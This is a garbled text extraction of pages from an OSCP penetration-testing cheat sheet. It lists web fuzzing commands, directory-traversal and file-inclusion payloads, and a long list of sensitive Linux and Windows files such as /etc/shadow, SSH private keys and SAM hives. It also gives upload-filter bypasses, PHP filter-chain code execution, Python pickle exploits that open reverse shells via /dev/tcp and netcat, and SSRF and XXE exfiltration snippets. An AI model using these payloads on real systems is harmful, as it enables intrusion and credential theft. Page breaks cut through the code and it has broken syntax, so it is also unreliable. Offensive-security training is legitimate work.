encoding Ctrl+Shift+u // URL decoding Set Proxy Environment Variables export
HTTP_PROXY=https://tinyurl.com/3fjzq export HTTPS_PROXY=https://tinyurl.com/4mk9oz cadaver
cadaver http://// dav://> cd C dav://C/> ls dav://C/> put Cross-Site Scripting (XSS) OSCP Cheat Sheet

24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 35 of 128 ffuf API Fuzzing Searching for LFI
Fuzzing with PHP Session ID Recursion File Extensions Rate Limiting Virtual Host Discovery ffuf -w
/usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fs -mc all ffuf -w
/usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fw -mc all ffuf -w
/usr/share/wordlists/dirb/common.txt -u http:///FUZZ -mc 200,204,301,302,307,401 -o results.txt ffuf -c
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http:/// -H "Host: FUZZ." -fs
185 ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u
http:///backups/backup_2020070416FUZZ.zip ffuf -u https:///api/v2/FUZZ -w api_seen_in_wild.txt -c -ac
-t 250 -fc 400,404,412 ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u
http:///admin../admin_staging/index.php?page=FUZZ -fs 15349 ffuf -w
/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u
"http:///admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644 ffuf -w
/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u
http:///cd/basic/FUZZ -recursion ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-
list-2.3-small.txt -u http:///cd/ext/logs/FUZZ -e .log ffuf -w /usr/share/wordlists/seclists/Discovery/Web-
Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http:///cd/rate/FUZZ -mc 200,429 OSCP Cheat Sheet
24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 36 of 128 Massive File Extension Discovery
GitTools ./gitdumper.sh http:///.git/ /PATH/TO/FOLDER ./extractor.sh /PATH/TO/FOLDER/
/PATH/TO/FOLDER/ Gobuster Common File Extensions txt,bak,php,html,js,asp,aspx Common Picture
Extensions png,jpg,jpeg,gif,bmp POST Requests ffuf -w
/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ." -u
http:// -fs 1495 ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http:///FUZZ -t 30 -c
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc
200,204,301,302,307,401,403,500 -ic -
e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.do
t,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.pht
ml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.
xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip -e // extended mode that renders the full url -k // skip ssl certificate
validation -r // follow cedirects -s // status codes -b // exclude status codes -k // ignore certificates --
wildcard // set wildcard option $ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-
medium.txt -u http:/// $ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http:/// -x
php $ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http:/// -x php,txt,html,js -e -s 200 $ gobuster
dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u
https://:/ -b 200 -k --wildcard gobuster dir -w
/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u
http:///api/ -e -s 200 OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 37 of 128
DNS Recon VHost Discovery Specifiy User Agent Local File Inclusion (LFI) http:///.php?file= http:///.php?
file=../../../../../../../../etc/passwd http:////php?file=../../../../../../../../../../etc/passwd Until php 5.3
http:////php?file=../../../../../../../../../../etc/passwd%00 Null Byte %00 0x00 Encoded Traversal
Strings ../ ..\ ..\/ %2e%2e%2f gobuster dns -d -w
/usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt gobuster dns -d -t 50 -
w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt gobuster vhost -u -t
50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt gobuster vhost -
u -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-
domain gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http:/// -a Linux
OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 38 of 128 %252e%252e%252f
%c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 %uff0e%uff0e%u2216 ..././ ...\.\ php://filter Wrapper
https://tinyurl.com/yux6oqdu https://tinyurl.com/y4ezgl4c/tree/master/File%20Inclusion
https://tinyurl.com/y4ezgl4c/tree/master/File%20Inclusion#wrapper-phpfilter
url=php://filter/convert.base64-encode/resource=file:////var/www//api.php Django, Rails, or Node.js
Web Application Header Values Accept:
../../../../.././../../../../etc/passwd{{ Accept: ../../../../.././../../../../etc/passwd{%0D
Accept: ../../../../.././../../../../etc/passwd{%0A Accept: ../../../../.././../../../../etc/passwd{%00
Accept: ../../../../.././../../../../etc/passwd{%0D{{ Accept:
../../../../.././../../../../etc/passwd{%0A{{ Accept: ../../../../.././../../../../etc/passwd{%00{{ Linux Files
/etc/passwd /etc/shadow /etc/aliases /etc/anacrontab /etc/apache2/apache2.conf
/etc/apache2/httpd.conf /etc/apache2/sites-enabled/000-default.conf /etc/at.allow http:///index.php?
page=php://filter/convert.base64-encode/resource=index
http:///index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd base64 -d .php
OSCP Cheat Sheet 24/10/2023, 08 :22 https://md2pdf.netlify.app/ Page 39 of 128 /etc/at.deny
/etc/bashrc /etc/bootptab /etc/chrootUsers /etc/chttp.conf /etc/cron.allow /etc/cron.deny
/etc/crontab /etc/cups/cupsd.conf /etc/exports /etc/fstab /etc/ftpaccess /etc/ftpchroot /etc/ftphosts
/etc/groups /etc/grub.conf /etc/hosts /etc/hosts.allow /etc/hosts.deny /etc/httpd/access.conf
/etc/httpd/conf/httpd.conf /etc/httpd/httpd.conf /etc/httpd/logs/access_log
/etc/httpd/logs/access.log /etc/httpd/logs/error_log /etc/httpd/logs/error.log /etc/httpd/php.ini
/etc/httpd/srm.conf /etc/inetd.conf /etc/inittab /etc/issue /etc/knockd.conf /etc/lighttpd.conf
/etc/lilo.conf /etc/logrotate.d/ftp /etc/logrotate.d/proftpd /etc/logrotate.d/vsftpd.log /etc/lsb-release
/etc/motd /etc/modules.conf /etc/motd /etc/mtab /etc/my.cnf /etc/my.conf /etc/mysql/my.cnf
/etc/network/interfaces /etc/networks /etc/npasswd OSCP Cheat Sheet 24/10/2023, 08 :22
https://md2pdf.netlify.app/ Page 40 of 128 /etc/passwd /etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini /etc/php4/apache/php.ini /etc/php4/cgi/php.ini
/etc/php4/apache2/php.ini /etc/php5/apache2/php.ini /etc/php5/apache/php.ini
/etc/php/apache2/php.ini /etc/php/apache/php.ini /etc/php/cgi/php.ini /etc/php.ini
/etc/php/php4/php.ini /etc/php/php.ini /etc/printcap /etc/profile /etc/proftp.conf
/etc/proftpd/proftpd.conf /etc/pure-ftpd.conf /etc/pureftpd.passwd /etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.pdb /etc/pure-ftpd/putreftpd.pdb /etc/redhat-
release /etc/resolv.conf /etc/samba/smb.conf /etc/snmpd.conf /etc/ssh/ssh_config
/etc/ssh/sshd_config /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key /etc/ssh/ssh_host_key.pub /etc/sysconfig/network /etc/syslog.conf
/etc/termcap /etc/vhcs2/proftpd/proftpd.conf /etc/vsftpd.chroot_list /etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf /etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftpusers /logs/pure-
ftpd.log /logs/security_debug_log /logs/security_log /opt/lampp/etc/httpd.conf OSCP Cheat Sheet
24/10/2023, 08 :22 https://md2pdf.netlify.app/ Page 41 of 128 /opt/xampp/etc/php.ini /proc/cmdline
/proc/cpuinfo /proc/filesystems /proc/interrupts /proc/ioports /proc/meminfo /proc/modules
/proc/mounts /proc/net/arp /proc/net/tcp /proc/net/udp /proc//cmdline /proc//maps
/proc/sched_debug /proc/self/cwd/app.py /proc/self/environ /proc/self/net/arp /proc/stat
/proc/swaps /proc/version /root/anaconda-ks.cfg /usr/etc/pure-ftpd.conf /usr/lib/php.ini
/usr/lib/php/php.ini /usr/local/apache/conf/modsec.conf /usr/local/apache/conf/php.ini
/usr/local/apache/log /usr/local/apache/logs /usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log /usr/local/apache/audit_log /usr/local/apache/error_log
/usr/local/apache/error.log /usr/local/cpanel/logs /usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log /usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini /usr/local/etc/pure-ftpd.conf /usr/local/etc/pureftpd.pdb /usr/local/lib/php.ini
/usr/local/php4/httpd.conf /usr/local/php4/httpd.conf.php OSCP Cheat Sheet 24/10/2023, 08 :22
https://md2pdf.netlify.app/ Page 42 of 128 /usr/local/php4/lib/php.ini /usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php /usr/local/php5/lib/php.ini /usr/local/php/httpd.conf
/usr/local/php/httpd.conf.ini /usr/local/php/lib/php.ini /usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdn /usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/httpd_log /usr/local/Zend/etc/php.ini /usr/sbin/pure-config.pl
/var/adm/log/xferlog /var/apache2/config.inc /var/apache/logs/access_log
/var/apache/logs/error_log /var/cpanel/cpanel.config /var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD /var/local/www/conf/php.ini /var/log/apache2/access_log
/var/log/apache2/access.log /var/log/apache2/error_log /var/log/apache2/error.log
/var/log/apache/access_log /var/log/apache/access.log /var/log/apache/error_log
/var/log/apache/error.log /var/log/apache-ssl/access.log /var/log/apache-ssl/error.log
/var/log/auth.log /var/log/boot /var/htmp /var/log/chttp.log /var/log/cups/error.log
/var/log/daemon.log /var/log/debug /var/log/dmesg /var/log/dpkg.log /var/log/exim_mainlog
/var/log/exim/mainlog /var/log/exim_paniclog /var/log/exim.paniclog /var/log/exim_rejectlog
/var/log/exim/rejectlog /var/log/faillog /var/log/ftplog OSCP Cheat Sheet 24/10/2023, 08 :22
https://md2pdf.netlify.app/ Page 43 of 128 /var/log/ftp-proxy /var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd-access.log /var/log/httpd/access_log /var/log/httpd/access.log
/var/log/httpd/error_log /var/log/httpd/error.log /var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log /var/log/kern.log /var/log/lastlog /var/log/lighttpd/access.log
/var/log/lighttpd/error.log /var/log/lighttpd/lighttpd.access.log /var/log/lighttpd/lighttpd.error.log
/var/log/mail.info /var/log/mail.log /var/log/maillog /var/log/mail.warn /var/log/message
/var/log/messages /var/log/mysqlderror.log /var/log/mysql.log /var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/log/proftpd /var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log /var/log/secure /var/log/vsftpd.log /var/log/wtmp /var/log/xferlog
/var/log/yum.log /var/mysql.log /var/run/utmp /var/spool/cron/crontabs/root
/var/webmin/miniserv.log /var/www/html/__init__.py /var/www/html/db_connect.php
/var/www/html/utils.php /var/www/log/access_log /var/www/log/error_log /var/www/logs/access_log
/var/www/logs/error_log /var/www/logs/access.log /var/www/logs/error.log ~/.atfp_history OSCP
Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 44 of 128 ~/.bash_history
~/.bash_logout ~/.bash_profile ~/.bashrc ~/.gtkrc ~/.login ~/.logout ~/.mysql_history ~/.nano_history
~/.php_history ~/.profile ~/.ssh/authorized_keys ~/.ssh/id_dsa ~/.ssh/id_dsa.pub ~/.ssh/id_rsa
~/.ssh/id_rsa.pub ~/.ssh/identity ~/.ssh/identity.pub ~/.viminfo ~/.wm_style ~/.Xdefaults ~/.xinitrc
~/.Xresources ~/.xsession Windows Files C:/Users/Administrator/NTUser.dat C:/Documents and
Settings/Administrator/NTUser.dat C:/apache/logs/access.log C:/apache/logs/error.log
C:/apache/php/php.ini C:/boot.ini C:/inetpub/wwwroot/global.asa C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err C:/MySQL/data/mysql.log C:/MySQL/my.cnf C:/MySQL/my.ini C:/php4/php.ini
C:/php5/php.ini C:/php/php.ini C:/Program Files/Apache Group/Apache2/conf/httpd.conf C:/Program
Files/Apache Group/Apache/conf/httpd.conf C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log OSCP Cheat Sheet 24/10/2023, 08:22
https://md2pdf.netlify.app/ Page 45 of 128 C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err C:/Program Files/MySQL/data/mysql-bin.log C:/Program
Files/MySQL/data/mysql.err C:/Program Files/MySQL/data/mysql.log C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log C:/Program Files/MySQL/MySQL Server
5.0/data/mysql.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log C:/Program
Files/MySQL/MySQL Server 5.0/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/my.ini C:/Program
Files (x86)/Apache Group/Apache2/conf/httpd.conf C:/Program Files (x86)/Apache
Group/Apache/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/access.log
C:/Program Files (x86)/Apache Group/Apache/conf/error.log C:/Program Files (x86)/FileZilla
Server/FileZilla Server.xml C:/Program Files (x86)/xampp/apache/conf/httpd.conf C:/WINDOWS/php.ini
C:/WINDOWS/Repair/SAM C:/Windows/repair/system C:/Windows/repair/software
C:/Windows/repair/security C:/WINDOWS/System32/drivers/etc/hosts C:/Windows/win.ini
C:/WINNT/php.ini C:/WINNT/win.ini C:/xampp/apache/bin/php.ini C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml C:/Windows/debug/NetSetup.log
C:/Windows/system32/config/AppEvent.Evt C:/Windows/system32/config/SecEvent.Evt
C:/Windows/system32/config/default.sav C:/Windows/system32/config/security.sav
C:/Windows/system32/config/software.sav C:/Windows/system32/config/system.sav
C:/Windows/system32/config/regback/default C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security C:/Windows/system32/config/regback/system
C:/Windows/system32/config/regback/software C:/Program Files/MySQL/MySQL Server 5.1/my.ini
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
C:/Windows/System32/inetsrv/config/applicationHost.config OSCP Cheat Sheet 24/10/2023, 08:22
https://md2pdf.netlify.app/ Page 46 of 128 C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log PDF
PHP Inclusion Create a file with a PDF header, which contains PHP code. %PDF-1.4 http:///index.php?
page=uploads/.pdf%00&cmd=whoami PHP Upload Filter
Bypasses .sh .cgi .inc .txt .pht .phtml .phP .Php .php3 .php4 .php5 .php7 .pht .phps .phar .phpt .pgif .pht
ml .phtm .php%00.jpeg .php%20 .php%0d%0a.jpg .php%0a .php.jpg OSCP Cheat Sheet 24/10/2023,
08:22 https://md2pdf.netlify.app/ Page 47 of 128 .php%00.gif .php\x00.gif .php%00.png .php\
x00.png .php%00.jpg .php\x00.jpg mv .jpg .php\x00.jpg PHP Filter Chain Generator
https://tinyurl.com/yv3gjun7 PHP Generic Gadget Chains (PHPGGC) phpggc -u --fast-destruct
Guzzle/FW1 /dev/shm/.txt /PATH/TO/FILE/.txt Server-Side Request Forgery (SSRF) https:///item/2?
server=server./file?id=9&x= Server-Side Template Injection (SSTI) Fuzz String
https://tinyurl.com/ypta53z7 python3 php_filter_chain_generator.py --chain '' python3
php_filter_chain_generator.py --chain "" python3 php_filter_chain_generator.py --chain """""" python3
php_filter_chain_generator.py --chain """""""" python3 php_filter_chain_generator.py --chain """"""""
http:///?page=php://filter/convert.base64-decode/resource=PD9waHAgZWNobyBzaGVsbF9leGVjKGlkKT
sgPz4 python3 php_filter_chain_generator.py --chain '' [+] The following gadget chain will generate the
following code : (base64 value: PD89IGV4ZWMoJF9HRVRbMF0pOyA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|<--- SNIP --->|
convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0= OSCP Cheat Sheet
24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 48 of 128 ${{ --> OSCP Cheat Sheet 24/10/2023,
08:22 https://md2pdf.netlify.app/ Page 125 of 128 command: chmod +s /bin/bash Exploit Skeleton
Python Script #!/usr/bin/python import socket,sys address = '127.0.0.1' port = 9999 buffer = #TBD try:
print '[+] Sending buffer' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((address,port)) s.recv(1024) s.send(buffer + '\r\n') except: print '[!] Unable to connect to the
application.' sys.exit(0) finally: s.close() JSON POST Request POST / HTTP/1.1 Host: User-Agent:
Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-
US,en;q=0.5 Content-Type: application/json Content-Length: 95 Connection: close { "auth":{ "name":"",
"password":"" }, "filename":"" } OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page
126 of 128 Python Pickle RCE import base64 import pickle import os class RCE: def __reduce__(self):
cmd = ("/bin/bash -c 'exec bash -i &>/dev/tcp// <&1'") return = os.system, (cmd, ) if __name__ ==
'__main__': pickle = pickle.dumps(RCE()) print(bas64.b64encode(pickled)) Python Redirect for SSRF
#!/usr/bin/python3 import sys from http.server import HTTPServer, BaseHTTPRequestHandler class
Redirect(BaseHTTPRequestHandler): def do_GET(self): self.send_response(302)
self.send_header('Location', sys.argv[1]) self.end_headers() HTTPServer(("0.0.0.0", 80),
Redirect).serve_forever() import pickle import sys import base64 command = 'rm /tmp/f; mkfifo /tmp/f;
cat /tmp/f | /bin/sh -i 2>&1 | netcat > /tmp/f' class rce(object): def __reduce__(self): import os return
(os.system,(command,)) print(base64.b64encode(pickle.dumps(rce()))) OSCP Cheat Sheet 24/10/2023,
08:22 https://md2pdf.netlify.app/ Page 127 of 128 sudo python3 redirect.py https://tinyurl.com/yjs6w2
#!/usr/bin/env python import SimpleHTTPServer import SocketServer import sys import argparse def
redirect_handler_factory(url): """ returns a request handler class that redirects to supplied `url` """ class
RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self):
self.send_response(301) self.send_header('Location', url) self.end_headers() def do_POST(self):
self.send_response(301) self.send_header('Location', url) self.end_headers() return RedirectHandler def
main(): parser = argparse.ArgumentParser(description='HTTP redirect server') parser.add_argument('--
port', '-p', action="store", type=int, default=80, help='port to listen on' parser.add_argument('--ip', '-i',
action="store", default="", help='host interface to listen on' parser.add_argument('redirect_url',
action="store") myargs = parser.parse_args() redirect_url = myargs.redirect_url port = myargs.port host =
myargs.ip redirectHandler = redirect_handler_factory(redirect_url) handler =
SocketServer.TCPServer((host, port), redirectHandler) print("serving at port %s" % port) OSCP Cheat
Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 128 of 128 Python Web Request XML External
Entity (XXE) Request SYSTEM "http:///.dtd">%;]> GET / ; Content of .dtd handler.serve_forever() if
__name__ == "__main__": main() import requests import re http_proxy = "https://tinyurl.com/hdorn"
proxyDict = { "http" : http_proxy, } // get a session r = requests.get('http://') // send request r =
requests.post('', data={'key': 'value'}, cookies={'PHPSESSID': r.cookies['PHPSESSID']} , proxies=proxyDict)
%eval; %exfiltrate;

You might also like